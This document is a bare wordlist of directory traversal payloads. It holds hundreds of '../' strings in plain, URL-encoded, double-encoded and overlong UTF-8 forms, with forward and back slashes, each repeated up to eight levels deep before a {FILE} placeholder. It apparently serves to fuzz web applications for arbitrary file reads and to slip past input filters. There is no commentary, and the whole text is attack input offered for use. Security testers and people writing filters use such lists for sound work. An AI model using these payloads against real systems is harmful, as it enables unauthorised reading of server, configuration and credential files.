%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
